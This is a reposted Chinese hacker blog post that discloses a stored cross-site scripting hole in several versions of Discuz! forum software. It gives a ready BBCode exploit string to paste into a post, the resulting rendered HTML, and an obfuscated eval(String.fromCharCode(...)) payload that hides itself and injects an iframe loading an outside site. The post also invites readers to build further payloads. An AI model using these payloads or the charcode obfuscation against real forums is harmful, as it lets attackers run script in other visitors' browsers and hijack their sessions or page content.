Discuz!多版本 存儲型XSS腳本漏洞 (0day)

轉自:http://www.ayhacker.net/ayblog/read.php?94

其實這不是很新,Discuz 已經修正了,不過XSS對IE(9)還是有效


2009年一次偶然間測試發現的此XSS漏洞,因為是存儲型的,我想大家應該知道它的危害吧。相隔這麼多年DZ不斷的更新版本,但此漏洞依然存在,今天就發佈出來吧!留著也沒什麼用會長毛的,呵呵。
在此我要感謝一下我的好朋友Jackal在09年的時候一起幫我測試漏洞的。
當時我們一起測試的是DZ6.0-DZ7.2,不知道是不是通殺啊。哈哈!沒有一個一個去測試。有條件的去測試一下吧。
發貼進入源碼模式,寫入如下的exp

[email][url][img]http://qhkest.com onmouseover=alert(/DZ-xss-0day/); [/img] [/url][/email]
上面代碼是以鼠標事件來觸發XSS的,剩下的大家可以自行發揮構造!!!

附上XSS完的源碼如下:

<a href="mailto:"></a><a href="%5C%22http://qhkest.com" onmouseover="alert(/DZ-xss-0day/);" \"="" target="\"_blank\""><img src="http://qhkest.com%20onmouseover=alert%28/DZ-xss-0day/%29;" onload="thumbImg(this)" alt=""> </a><
我想你們一看就明白了吧!!!
漏洞證明:
本地測試結果:
Discuz! X2


以下應用華東耶穌的話:

[email][url][img]http://qhkest.com onmouseover=alert(/DZ-xss-0day/); [/img] [/url][/email]
雞肋在於,要鼠標觸碰才能觸發,但是,鼠標觸碰還是概率很大很大的嘛。
把上面的alert(/DZ-XSS-0DAY/)
換成

eval(String.fromCharCode(116,104,105,115,46,115,116,121,108,101,46,100,105,115,112,108,97,

121,61,34,110,111,110,101,34,59,102,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,

101,69,108,101,109,101,110,116,40,34,105,102,114,97,109,101,34,41,59,102,46,115,114,99,61,

34,104,116,116,112,58,47,47,119,119,119,46,98,97,34,43,34,105,100,117,46,99,111,109,34,59,

102,46,104,101,105,103,104,116,61,34,51,48,48,34,59,102,46,119,105,100,116,104,61,34,51,48,

48,34,59,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,

84,97,103,78,97,109,101,40,34,98,111,100,121,34,41,91,48,93,46,97,112,112,101,110,100,67,104,

105,108,100,40,102,41,59))



鼠標觸碰效果:


加密過程,就是10進制加密啦,如圖。


解密下看下代碼。

作者: 黑病毒&qhkest  &3hack

留言

本月最夯

偷用電腦,怎知?事件檢視器全記錄!(開機時間、啟動項時間...)